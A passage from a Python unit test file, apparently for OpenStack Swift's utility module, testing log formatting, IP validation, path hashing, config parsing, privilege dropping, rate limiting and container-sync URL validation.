unreachable', log_msg) log_exception(socket.error(errno.ETIMEDOUT, 'my error message')) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertNotIn('my error message', log_msg) self.assertIn('Connection timeout', log_msg) # unfiltered log_exception(socket.error(0, 'my error message')) log_msg = strip_value(sio) self.assertIn('Traceback', log_msg) self.assertIn('my error message', log_msg) # test eventlet.Timeout connection_timeout = ConnectionTimeout(42, 'my error message') log_exception(connection_timeout) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertTrue('ConnectionTimeout' in log_msg) self.assertTrue('(42s)' in log_msg) self.assertNotIn('my error message', log_msg) connection_timeout.cancel() message_timeout = MessageTimeout(42, 'my error message') log_exception(message_timeout) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertTrue('MessageTimeout' in log_msg) self.assertTrue('(42s)' in log_msg) self.assertTrue('my error message' in log_msg) message_timeout.cancel() # test BadStatusLine log_exception(http_client.BadStatusLine('')) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertIn('BadStatusLine', log_msg) self.assertIn("''", log_msg) # test unhandled log_exception(Exception('my error message')) log_msg = strip_value(sio) self.assertTrue('Traceback' in log_msg) self.assertTrue('my error message' in log_msg) finally: logger.logger.removeHandler(handler) @reset_logger_state def test_swift_log_formatter_max_line_length(self): # setup stream logging sio = StringIO() logger = utils.get_logger(None) handler = logging.StreamHandler(sio) formatter = utils.SwiftLogFormatter(max_line_length=10) handler.setFormatter(formatter) logger.logger.addHandler(handler) def strip_value(sio): sio.seek(0) v = sio.getvalue() sio.truncate(0) return v try: logger.info('12345') self.assertEqual(strip_value(sio), '12345\n') logger.info('1234567890') self.assertEqual(strip_value(sio), '1234567890\n') logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '12 ... de\n') formatter.max_line_length = 11 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '123 ... cde\n') formatter.max_line_length = 0 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '1234567890abcde\n') formatter.max_line_length = 1 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '1\n') formatter.max_line_length = 2 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '12\n') formatter.max_line_length = 3 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '123\n') formatter.max_line_length = 4 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '1234\n') formatter.max_line_length = 5 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '12345\n') formatter.max_line_length = 6 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '123456\n') formatter.max_line_length = 7 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '1 ... e\n') formatter.max_line_length = -10 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '1234567890abcde\n') finally: logger.logger.removeHandler(handler) @reset_logger_state def test_swift_log_formatter(self): # setup stream logging sio = StringIO() logger = utils.get_logger(None) handler = logging.StreamHandler(sio) handler.setFormatter(utils.SwiftLogFormatter()) logger.logger.addHandler(handler) def strip_value(sio): sio.seek(0) v = sio.getvalue() sio.truncate(0) return v try: self.assertFalse(logger.txn_id) logger.error('my error message') log_msg = strip_value(sio) self.assertIn('my error message', log_msg) self.assertNotIn('txn', log_msg) logger.txn_id = '12345' logger.error('test') log_msg = strip_value(sio) self.assertIn('txn', log_msg) self.assertIn('12345', log_msg) # test txn in info message self.assertEqual(logger.txn_id, '12345') logger.info('test') log_msg = strip_value(sio) self.assertIn('txn', log_msg) self.assertIn('12345', log_msg) # test txn already in message self.assertEqual(logger.txn_id, '12345') logger.warning('test 12345 test') self.assertEqual(strip_value(sio), 'test 12345 test\n') # Test multi line collapsing logger.error('my\nerror\nmessage') log_msg = strip_value(sio) self.assertIn('my#012error#012message', log_msg) # test client_ip self.assertFalse(logger.client_ip) logger.error('my error message') log_msg = strip_value(sio) self.assertIn('my error message', log_msg) self.assertNotIn('client_ip', log_msg) logger.client_ip = '1.2.3.4' logger.error('test') log_msg = strip_value(sio) self.assertIn('client_ip', log_msg) self.assertIn('1.2.3.4', log_msg) # test no client_ip on info message self.assertEqual(logger.client_ip, '1.2.3.4') logger.info('test') log_msg = strip_value(sio) self.assertNotIn('client_ip', log_msg) self.assertNotIn('1.2.3.4', log_msg) # test client_ip (and txn) already in message self.assertEqual(logger.client_ip, '1.2.3.4') logger.warning('test 1.2.3.4 test 12345') self.assertEqual(strip_value(sio), 'test 1.2.3.4 test 12345\n') finally: logger.logger.removeHandler(handler) def test_storage_directory(self): self.assertEqual(utils.storage_directory('objects', '1', 'ABCDEF'), 'objects/1/DEF/ABCDEF') def test_is_valid_ip(self): self.assertTrue(is_valid_ip("127.0.0.1")) self.assertTrue(is_valid_ip("10.0.0.1")) ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80::204:61ff:fe9d:f156" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80::204:61ff:254.157.241.86" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80::" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "::1" self.assertTrue(is_valid_ip(ipv6)) not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a" self.assertFalse(is_valid_ip(not_ipv6)) not_ipv6 = "1:2:3:4:5:6::7:8" self.assertFalse(is_valid_ip(not_ipv6)) def test_is_valid_ipv4(self): self.assertTrue(is_valid_ipv4("127.0.0.1")) self.assertTrue(is_valid_ipv4("10.0.0.1")) ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80::204:61ff:fe9d:f156" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80::204:61ff:254.157.241.86" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80::" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "::1" self.assertFalse(is_valid_ipv4(ipv6)) not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a" self.assertFalse(is_valid_ipv4(not_ipv6)) not_ipv6 = "1:2:3:4:5:6::7:8" self.assertFalse(is_valid_ipv4(not_ipv6)) def test_is_valid_ipv6(self): self.assertFalse(is_valid_ipv6("127.0.0.1")) self.assertFalse(is_valid_ipv6("10.0.0.1")) ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80::204:61ff:fe9d:f156" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80::204:61ff:254.157.241.86" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80::" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "::1" self.assertTrue(is_valid_ipv6(ipv6)) not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a" self.assertFalse(is_valid_ipv6(not_ipv6)) not_ipv6 = "1:2:3:4:5:6::7:8" self.assertFalse(is_valid_ipv6(not_ipv6)) def test_expand_ipv6(self): expanded_ipv6 = "fe80::204:61ff:fe9d:f156" upper_ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156" self.assertEqual(expanded_ipv6, utils.expand_ipv6(upper_ipv6)) omit_ipv6 = "fe80:0000:0000::0204:61ff:fe9d:f156" self.assertEqual(expanded_ipv6, utils.expand_ipv6(omit_ipv6)) less_num_ipv6 = "fe80:0:00:000:0204:61ff:fe9d:f156" self.assertEqual(expanded_ipv6, utils.expand_ipv6(less_num_ipv6)) def test_whataremyips(self): myips = utils.whataremyips() self.assertTrue(len(myips) > 1) self.assertTrue('127.0.0.1' in myips) def test_whataremyips_bind_to_all(self): for any_addr in ('0.0.0.0', '0000:0000:0000:0000:0000:0000:0000:0000', '::0', '::0000', '::', # Wacky parse-error input produces all IPs 'I am a bear'): myips = utils.whataremyips(any_addr) self.assertTrue(len(myips) > 1) self.assertTrue('127.0.0.1' in myips) def test_whataremyips_bind_ip_specific(self): self.assertEqual(['1.2.3.4'], utils.whataremyips('1.2.3.4')) def test_whataremyips_error(self): def my_interfaces(): return ['eth0'] def my_ifaddress_error(interface): raise ValueError with patch('netifaces.interfaces', my_interfaces), \ patch('netifaces.ifaddresses', my_ifaddress_error): self.assertEqual(utils.whataremyips(), []) def test_whataremyips_ipv6(self): test_ipv6_address = '2001:6b0:dead:beef:2::32' test_interface = 'eth0' def my_ipv6_interfaces(): return ['eth0'] def my_ipv6_ifaddresses(interface): return {AF_INET6: [{'netmask': 'ffff:ffff:ffff:ffff::', 'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]} with patch('netifaces.interfaces', my_ipv6_interfaces), \ patch('netifaces.ifaddresses', my_ipv6_ifaddresses): myips = utils.whataremyips() self.assertEqual(len(myips), 1) self.assertEqual(myips[0], test_ipv6_address) def test_hash_path(self): # Yes, these tests are deliberately very fragile. We want to make sure # that if someones changes the results hash_path produces, they know it with mock.patch('swift.common.utils.HASH_PATH_PREFIX', b''): self.assertEqual(utils.hash_path('a'), '1c84525acb02107ea475dcd3d09c2c58') self.assertEqual(utils.hash_path('a', 'c'), '33379ecb053aa5c9e356c68997cbb59e') self.assertEqual(utils.hash_path('a', 'c', 'o'), '06fbf0b514e5199dfc4e00f42eb5ea83') self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False), '06fbf0b514e5199dfc4e00f42eb5ea83') self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=True), b'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN' b'\x00\xf4.\xb5\xea\x83') self.assertRaises(ValueError, utils.hash_path, 'a', object='o') utils.HASH_PATH_PREFIX = b'abcdef' self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False), '363f9b535bfb7d17a43a46a358afca0e') def test_validate_hash_conf(self): # no section causes InvalidHashPathConfigError self._test_validate_hash_conf([], [], True) # 'swift-hash' section is there but no options causes # InvalidHashPathConfigError self._test_validate_hash_conf(['swift-hash'], [], True) # if we have the section and either of prefix or suffix, # InvalidHashPathConfigError doesn't occur self._test_validate_hash_conf( ['swift-hash'], ['swift_hash_path_prefix'], False) self._test_validate_hash_conf( ['swift-hash'], ['swift_hash_path_suffix'], False) # definitely, we have the section and both of them, # InvalidHashPathConfigError doesn't occur self._test_validate_hash_conf( ['swift-hash'], ['swift_hash_path_suffix', 'swift_hash_path_prefix'], False) # But invalid section name should make an error even if valid # options are there self._test_validate_hash_conf( ['swift-hash-xxx'], ['swift_hash_path_suffix', 'swift_hash_path_prefix'], True) # Unreadable/missing swift.conf causes IOError # We mock in case the unit tests are run on a laptop with SAIO, # which does have a natural /etc/swift/swift.conf. with mock.patch('swift.common.utils.HASH_PATH_PREFIX', b''), \ mock.patch('swift.common.utils.HASH_PATH_SUFFIX', b''), \ mock.patch('swift.common.utils.SWIFT_CONF_FILE', '/nosuchfile'), \ self.assertRaises(IOError): utils.validate_hash_conf() def _test_validate_hash_conf(self, sections, options, should_raise_error): class FakeConfigParser(object): def readfp(self, fp): pass def get(self, section, option): if section not in sections: raise NoSectionError('section error') elif option not in options: raise NoOptionError('option error', 'this option') else: return 'some_option_value' with mock.patch('swift.common.utils.HASH_PATH_PREFIX', b''), \ mock.patch('swift.common.utils.HASH_PATH_SUFFIX', b''), \ mock.patch('swift.common.utils.SWIFT_CONF_FILE', '/dev/null'), \ mock.patch('swift.common.utils.ConfigParser', FakeConfigParser): try: utils.validate_hash_conf() except utils.InvalidHashPathConfigError: if not should_raise_error: self.fail('validate_hash_conf should not raise an error') else: if should_raise_error: self.fail('validate_hash_conf should raise an error') def test_load_libc_function(self): self.assertTrue(callable( utils.load_libc_function('printf'))) self.assertTrue(callable( utils.load_libc_function('some_not_real_function'))) self.assertRaises(AttributeError, utils.load_libc_function, 'some_not_real_function', fail_if_missing=True) def test_readconf(self): conf = '''[section1] foo = bar [section2] log_name = yarr''' # setup a real file fd, temppath = tempfile.mkstemp() with os.fdopen(fd, 'w') as f: f.write(conf) make_filename = lambda: temppath # setup a file stream make_fp = lambda: StringIO(conf) for conf_object_maker in (make_filename, make_fp): conffile = conf_object_maker() result = utils.readconf(conffile) expected = {'__file__': conffile, 'log_name': None, 'section1': {'foo': 'bar'}, 'section2': {'log_name': 'yarr'}} self.assertEqual(result, expected) conffile = conf_object_maker() result = utils.readconf(conffile, 'section1') expected = {'__file__': conffile, 'log_name': 'section1', 'foo': 'bar'} self.assertEqual(result, expected) conffile = conf_object_maker() result = utils.readconf(conffile, 'section2').get('log_name') expected = 'yarr' self.assertEqual(result, expected) conffile = conf_object_maker() result = utils.readconf(conffile, 'section1', log_name='foo').get('log_name') expected = 'foo' self.assertEqual(result, expected) conffile = conf_object_maker() result = utils.readconf(conffile, 'section1', defaults={'bar': 'baz'}) expected = {'__file__': conffile, 'log_name': 'section1', 'foo': 'bar', 'bar': 'baz'} self.assertEqual(result, expected) self.assertRaisesRegexp( ValueError, 'Unable to find section3 config section in.*', utils.readconf, temppath, 'section3') os.unlink(temppath) self.assertRaises(IOError, utils.readconf, temppath) def test_readconf_raw(self): conf = '''[section1] foo = bar [section2] log_name = %(yarr)s''' # setup a real file fd, temppath = tempfile.mkstemp() with os.fdopen(fd, 'w') as f: f.write(conf) make_filename = lambda: temppath # setup a file stream make_fp = lambda: StringIO(conf) for conf_object_maker in (make_filename, make_fp): conffile = conf_object_maker() result = utils.readconf(conffile, raw=True) expected = {'__file__': conffile, 'log_name': None, 'section1': {'foo': 'bar'}, 'section2': {'log_name': '%(yarr)s'}} self.assertEqual(result, expected) os.unlink(temppath) self.assertRaises(IOError, utils.readconf, temppath) def test_readconf_dir(self): config_dir = { 'server.conf.d/01.conf': """ [DEFAULT] port = 8080 foo = bar [section1] name=section1 """, 'server.conf.d/section2.conf': """ [DEFAULT] port = 8081 bar = baz [section2] name=section2 """, 'other-server.conf.d/01.conf': """ [DEFAULT] port = 8082 [section3] name=section3 """ } # strip indent from test config contents config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items()) with temptree(*zip(*config_dir.items())) as path: conf_dir = os.path.join(path, 'server.conf.d') conf = utils.readconf(conf_dir) expected = { '__file__': os.path.join(path, 'server.conf.d'), 'log_name': None, 'section1': { 'port': '8081', 'foo': 'bar', 'bar': 'baz', 'name': 'section1', }, 'section2': { 'port': '8081', 'foo': 'bar', 'bar': 'baz', 'name': 'section2', }, } self.assertEqual(conf, expected) def test_readconf_dir_ignores_hidden_and_nondotconf_files(self): config_dir = { 'server.conf.d/01.conf': """ [section1] port = 8080 """, 'server.conf.d/.01.conf.swp': """ [section] port = 8081 """, 'server.conf.d/01.conf-bak': """ [section] port = 8082 """, } # strip indent from test config contents config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items()) with temptree(*zip(*config_dir.items())) as path: conf_dir = os.path.join(path, 'server.conf.d') conf = utils.readconf(conf_dir) expected = { '__file__': os.path.join(path, 'server.conf.d'), 'log_name': None, 'section1': { 'port': '8080', }, } self.assertEqual(conf, expected) def test_drop_privileges(self): required_func_calls = ('setgroups', 'setgid', 'setuid') mock_os = MockOs(called_funcs=required_func_calls) user = getuser() user_data = pwd.getpwnam(user) self.assertFalse(mock_os.called_funcs) # sanity check # over-ride os with mock with mock.patch('swift.common.utils.os', mock_os): # exercise the code utils.drop_privileges(user) for func in required_func_calls: self.assertIn(func, mock_os.called_funcs) self.assertEqual(user_data[5], mock_os.environ['HOME']) groups = {g.gr_gid for g in grp.getgrall() if user in g.gr_mem} self.assertEqual(groups, set(mock_os.called_funcs['setgroups'][0])) self.assertEqual(user_data[3], mock_os.called_funcs['setgid'][0]) self.assertEqual(user_data[2], mock_os.called_funcs['setuid'][0]) def test_drop_privileges_no_setgroups(self): required_func_calls = ('geteuid', 'setgid', 'setuid') mock_os = MockOs(called_funcs=required_func_calls) user = getuser() user_data = pwd.getpwnam(user) self.assertFalse(mock_os.called_funcs) # sanity check # over-ride os with mock with mock.patch('swift.common.utils.os', mock_os): # exercise the code utils.drop_privileges(user) for func in required_func_calls: self.assertIn(func, mock_os.called_funcs) self.assertNotIn('setgroups', mock_os.called_funcs) self.assertEqual(user_data[5], mock_os.environ['HOME']) self.assertEqual(user_data[3], mock_os.called_funcs['setgid'][0]) self.assertEqual(user_data[2], mock_os.called_funcs['setuid'][0]) def test_clean_up_daemon_hygene(self): required_func_calls = ('chdir', 'umask') # OSError if trying to get session leader, but setsid() OSError is # ignored by the code under test. bad_func_calls = ('setsid',) mock_os = MockOs(called_funcs=required_func_calls, raise_funcs=bad_func_calls) with mock.patch('swift.common.utils.os', mock_os): # exercise the code utils.clean_up_daemon_hygiene() for func in required_func_calls: self.assertIn(func, mock_os.called_funcs) for func in bad_func_calls: self.assertIn(func, mock_os.called_funcs) self.assertEqual('/', mock_os.called_funcs['chdir'][0]) self.assertEqual(0o22, mock_os.called_funcs['umask'][0]) @reset_logger_state def test_capture_stdio(self): # stubs logger = utils.get_logger(None, 'dummy') # mock utils system modules _orig_sys = utils.sys _orig_os = utils.os try: utils.sys = MockSys() utils.os = MockOs() # basic test utils.capture_stdio(logger) self.assertTrue(utils.sys.excepthook is not None) self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds) self.assertTrue( isinstance(utils.sys.stdout, utils.LoggerFileObject)) self.assertTrue( isinstance(utils.sys.stderr, utils.LoggerFileObject)) # reset; test same args, but exc when trying to close stdio utils.os = MockOs(raise_funcs=('dup2',)) utils.sys = MockSys() # test unable to close stdio utils.capture_stdio(logger) self.assertTrue(utils.sys.excepthook is not None) self.assertEqual(utils.os.closed_fds, []) self.assertTrue( isinstance(utils.sys.stdout, utils.LoggerFileObject)) self.assertTrue( isinstance(utils.sys.stderr, utils.LoggerFileObject)) # reset; test some other args utils.os = MockOs() utils.sys = MockSys() logger = utils.get_logger(None, log_to_console=True) # test console log utils.capture_stdio(logger, capture_stdout=False, capture_stderr=False) self.assertTrue(utils.sys.excepthook is not None) # when logging to console, stderr remains open self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds[:2]) reset_loggers() # stdio not captured self.assertFalse(isinstance(utils.sys.stdout, utils.LoggerFileObject)) self.assertFalse(isinstance(utils.sys.stderr, utils.LoggerFileObject)) finally: utils.sys = _orig_sys utils.os = _orig_os @reset_logger_state def test_get_logger_console(self): logger = utils.get_logger(None) console_handlers = [h for h in logger.logger.handlers if isinstance(h, logging.StreamHandler)] self.assertFalse(console_handlers) logger = utils.get_logger(None, log_to_console=True) console_handlers = [h for h in logger.logger.handlers if isinstance(h, logging.StreamHandler)] self.assertTrue(console_handlers) # make sure you can't have two console handlers self.assertEqual(len(console_handlers), 1) old_handler = console_handlers[0] logger = utils.get_logger(None, log_to_console=True) console_handlers = [h for h in logger.logger.handlers if isinstance(h, logging.StreamHandler)] self.assertEqual(len(console_handlers), 1) new_handler = console_handlers[0] self.assertNotEqual(new_handler, old_handler) def verify_under_pseudo_time( self, func, target_runtime_ms=1, *args, **kwargs): curr_time = [42.0] def my_time(): curr_time[0] += 0.001 return curr_time[0] def my_sleep(duration): curr_time[0] += 0.001 curr_time[0] += duration with patch('time.time', my_time), \ patch('time.sleep', my_sleep), \ patch('eventlet.sleep', my_sleep): start = time.time() func(*args, **kwargs) # make sure it's accurate to 10th of a second, converting the time # difference to milliseconds, 100 milliseconds is 1/10 of a second diff_from_target_ms = abs( target_runtime_ms - ((time.time() - start) * 1000)) self.assertTrue(diff_from_target_ms < 100, "Expected %d < 100" % diff_from_target_ms) def test_ratelimit_sleep(self): def testfunc(): running_time = 0 for i in range(100): running_time = utils.ratelimit_sleep(running_time, -5) self.verify_under_pseudo_time(testfunc, target_runtime_ms=1) def testfunc(): running_time = 0 for i in range(100): running_time = utils.ratelimit_sleep(running_time, 0) self.verify_under_pseudo_time(testfunc, target_runtime_ms=1) def testfunc(): running_time = 0 for i in range(50): running_time = utils.ratelimit_sleep(running_time, 200) self.verify_under_pseudo_time(testfunc, target_runtime_ms=250) def test_ratelimit_sleep_with_incr(self): def testfunc(): running_time = 0 vals = [5, 17, 0, 3, 11, 30, 40, 4, 13, 2, -1] * 2 # adds up to 248 total = 0 for i in vals: running_time = utils.ratelimit_sleep(running_time, 500, incr_by=i) total += i self.assertEqual(248, total) self.verify_under_pseudo_time(testfunc, target_runtime_ms=500) def test_ratelimit_sleep_with_sleep(self): def testfunc(): running_time = 0 sleeps = [0] * 7 + [.2] * 3 + [0] * 30 for i in sleeps: running_time = utils.ratelimit_sleep(running_time, 40, rate_buffer=1) time.sleep(i) self.verify_under_pseudo_time(testfunc, target_runtime_ms=900) def test_search_tree(self): # file match & ext miss with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t: asdf = utils.search_tree(t, 'a*', '.conf') self.assertEqual(len(asdf), 1) self.assertEqual(asdf[0], os.path.join(t, 'asdf.conf')) # multi-file match & glob miss & sort with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t: app_bins = utils.search_tree(t, 'app*', 'bin') self.assertEqual(len(app_bins), 2) self.assertEqual(app_bins[0], os.path.join(t, 'apple.bin')) self.assertEqual(app_bins[1], os.path.join(t, 'application.bin')) # test file in folder & ext miss & glob miss files = ( 'sub/file1.ini', 'sub/file2.conf', 'sub.bin', 'bus.ini', 'bus/file3.ini', ) with temptree(files) as t: sub_ini = utils.search_tree(t, 'sub*', '.ini') self.assertEqual(len(sub_ini), 1) self.assertEqual(sub_ini[0], os.path.join(t, 'sub/file1.ini')) # test multi-file in folder & sub-folder & ext miss & glob miss files = ( 'folder_file.txt', 'folder/1.txt', 'folder/sub/2.txt', 'folder2/3.txt', 'Folder3/4.txt' 'folder.rc', ) with temptree(files) as t: folder_texts = utils.search_tree(t, 'folder*', '.txt') self.assertEqual(len(folder_texts), 4) f1 = os.path.join(t, 'folder_file.txt') f2 = os.path.join(t, 'folder/1.txt') f3 = os.path.join(t, 'folder/sub/2.txt') f4 = os.path.join(t, 'folder2/3.txt') for f in [f1, f2, f3, f4]: self.assertTrue(f in folder_texts) def test_search_tree_with_directory_ext_match(self): files = ( 'object-server/object-server.conf-base', 'object-server/1.conf.d/base.conf', 'object-server/1.conf.d/1.conf', 'object-server/2.conf.d/base.conf', 'object-server/2.conf.d/2.conf', 'object-server/3.conf.d/base.conf', 'object-server/3.conf.d/3.conf', 'object-server/4.conf.d/base.conf', 'object-server/4.conf.d/4.conf', ) with temptree(files) as t: conf_dirs = utils.search_tree(t, 'object-server', '.conf', dir_ext='conf.d') self.assertEqual(len(conf_dirs), 4) for i in range(4): conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1)) self.assertTrue(conf_dir in conf_dirs) def test_search_tree_conf_dir_with_named_conf_match(self): files = ( 'proxy-server/proxy-server.conf.d/base.conf', 'proxy-server/proxy-server.conf.d/pipeline.conf', 'proxy-server/proxy-noauth.conf.d/base.conf', 'proxy-server/proxy-noauth.conf.d/pipeline.conf', ) with temptree(files) as t: conf_dirs = utils.search_tree(t, 'proxy-server', 'noauth.conf', dir_ext='noauth.conf.d') self.assertEqual(len(conf_dirs), 1) conf_dir = conf_dirs[0] expected = os.path.join(t, 'proxy-server/proxy-noauth.conf.d') self.assertEqual(conf_dir, expected) def test_search_tree_conf_dir_pid_with_named_conf_match(self): files = ( 'proxy-server/proxy-server.pid.d', 'proxy-server/proxy-noauth.pid.d', ) with temptree(files) as t: pid_files = utils.search_tree(t, 'proxy-server', exts=['noauth.pid', 'noauth.pid.d']) self.assertEqual(len(pid_files), 1) pid_file = pid_files[0] expected = os.path.join(t, 'proxy-server/proxy-noauth.pid.d') self.assertEqual(pid_file, expected) def test_write_file(self): with temptree([]) as t: file_name = os.path.join(t, 'test') utils.write_file(file_name, 'test') with open(file_name, 'r') as f: contents = f.read() self.assertEqual(contents, 'test') # and also subdirs file_name = os.path.join(t, 'subdir/test2') utils.write_file(file_name, 'test2') with open(file_name, 'r') as f: contents = f.read() self.assertEqual(contents, 'test2') # but can't over-write files file_name = os.path.join(t, 'subdir/test2/test3') self.assertRaises(IOError, utils.write_file, file_name, 'test3') def test_remove_file(self): with temptree([]) as t: file_name = os.path.join(t, 'blah.pid') # assert no raise self.assertEqual(os.path.exists(file_name), False) self.assertIsNone(utils.remove_file(file_name)) with open(file_name, 'w') as f: f.write('1') self.assertTrue(os.path.exists(file_name)) self.assertIsNone(utils.remove_file(file_name)) self.assertFalse(os.path.exists(file_name)) def test_remove_directory(self): with temptree([]) as t: dir_name = os.path.join(t, 'subdir') os.mkdir(dir_name) self.assertTrue(os.path.isdir(dir_name)) self.assertIsNone(utils.remove_directory(dir_name)) self.assertFalse(os.path.exists(dir_name)) # assert no raise only if it does not exist, or is not empty self.assertEqual(os.path.exists(dir_name), False) self.assertIsNone(utils.remove_directory(dir_name)) _m_rmdir = mock.Mock( side_effect=OSError(errno.ENOTEMPTY, os.strerror(errno.ENOTEMPTY))) with mock.patch('swift.common.utils.os.rmdir', _m_rmdir): self.assertIsNone(utils.remove_directory(dir_name)) _m_rmdir = mock.Mock( side_effect=OSError(errno.EPERM, os.strerror(errno.EPERM))) with mock.patch('swift.common.utils.os.rmdir', _m_rmdir): self.assertRaises(OSError, utils.remove_directory, dir_name) def test_human_readable(self): self.assertEqual(utils.human_readable(0), '0') self.assertEqual(utils.human_readable(1), '1') self.assertEqual(utils.human_readable(10), '10') self.assertEqual(utils.human_readable(100), '100') self.assertEqual(utils.human_readable(999), '999') self.assertEqual(utils.human_readable(1024), '1Ki') self.assertEqual(utils.human_readable(1535), '1Ki') self.assertEqual(utils.human_readable(1536), '2Ki') self.assertEqual(utils.human_readable(1047552), '1023Ki') self.assertEqual(utils.human_readable(1048063), '1023Ki') self.assertEqual(utils.human_readable(1048064), '1Mi') self.assertEqual(utils.human_readable(1048576), '1Mi') self.assertEqual(utils.human_readable(1073741824), '1Gi') self.assertEqual(utils.human_readable(1099511627776), '1Ti') self.assertEqual(utils.human_readable(1125899906842624), '1Pi') self.assertEqual(utils.human_readable(1152921504606846976), '1Ei') self.assertEqual(utils.human_readable(1180591620717411303424), '1Zi') self.assertEqual(utils.human_readable(1208925819614629174706176), '1Yi') self.assertEqual(utils.human_readable(1237940039285380274899124224), '1024Yi') def test_validate_sync_to(self): fname = 'container-sync-realms.conf' fcontents = ''' [US] key = 9ff3b71c849749dbaec4ccdd3cbab62b cluster_dfw1 = http://dfw1.host/v1/ ''' with temptree([fname], [fcontents]) as tempdir: logger = FakeLogger() fpath = os.path.join(tempdir, fname) csr = ContainerSyncRealms(fpath, logger) for realms_conf in (None, csr): for goodurl, result in ( ('http://1.1.1.1/v1/a/c', (None, 'http://1.1.1.1/v1/a/c', None, None)), ('http://1.1.1.1:8080/a/c', (None, 'http://1.1.1.1:8080/a/c', None, None)), ('http://2.2.2.2/a/c', (None, 'http://2.2.2.2/a/c', None, None)), ('https://1.1.1.1/v1/a/c', (None, 'https://1.1.1.1/v1/a/c', None, None)), ('//US/DFW1/a/c', (None, 'http://dfw1.host/v1/a/c', 'US', '9ff3b71c849749dbaec4ccdd3cbab62b')), ('//us/DFW1/a/c', (None, 'http://dfw1.host/v1/a/c', 'US', '9ff3b71c849749dbaec4ccdd3cbab62b')), ('//us/dfw1/a/c', (None, 'http://dfw1.host/v1/a/c', 'US', '9ff3b71c849749dbaec4ccdd3cbab62b')), ('//', (None, None, None, None)), ('', (None, None, None, None))): if goodurl.startswith('//') and not realms_conf: self.assertEqual( utils.validate_sync_to( goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf), (None, None, None, None)) else: self.assertEqual( utils.validate_sync_to( goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf), result) for badurl, result in ( ('http://1.1.1.1', ('Path required in X-Container-Sync-To', None, None, None)), ('httpq://1.1.1.1/v1/a/c', ('Invalid scheme \'httpq\' in X-Container-Sync-To, ' 'must be "//", "http", or "https".', None, None, None)), ('http://1.1.1.1/v1/a/c?query', ('Params, queries, and fragments not allowed in ' 'X-Container-Sync-To', None, None, None)), ('http://1.1.1.1/v1/a/c#frag', ('Params, queries, and fragments not allowed in ' 'X-Container-Sync-To', None, None, None)), ('http://1.1.1.1/v1/a/c?query#frag', ('Params, queries, and fragments not allowed in ' 'X-Container-Sync-To', None, None, None)), ('http://1.1.1.1/v1/a/c?query=param', ('Params, queries, and fragments not allowed in ' 'X-Container-Sync-To', None, None, None)), ('http://1.1.1.1/v1/a/c?query=param#frag', ('Params, queries, and fragments not allowed in ' 'X-Container-Sync-To', None, None, None)), ('http://1.1.1.2/v1/a/c', ("Invalid host '1.1.1.2' in X-Container-Sync-To", None, None, None)), ('//us/invalid/a/c', ("No cluster endpoint for 'us' 'invalid'", None, None, None)), ('//invalid/dfw1/a/c', ("No realm key for 'invalid'", None, None, None)), ('//us/invalid1/a/', ("Invalid 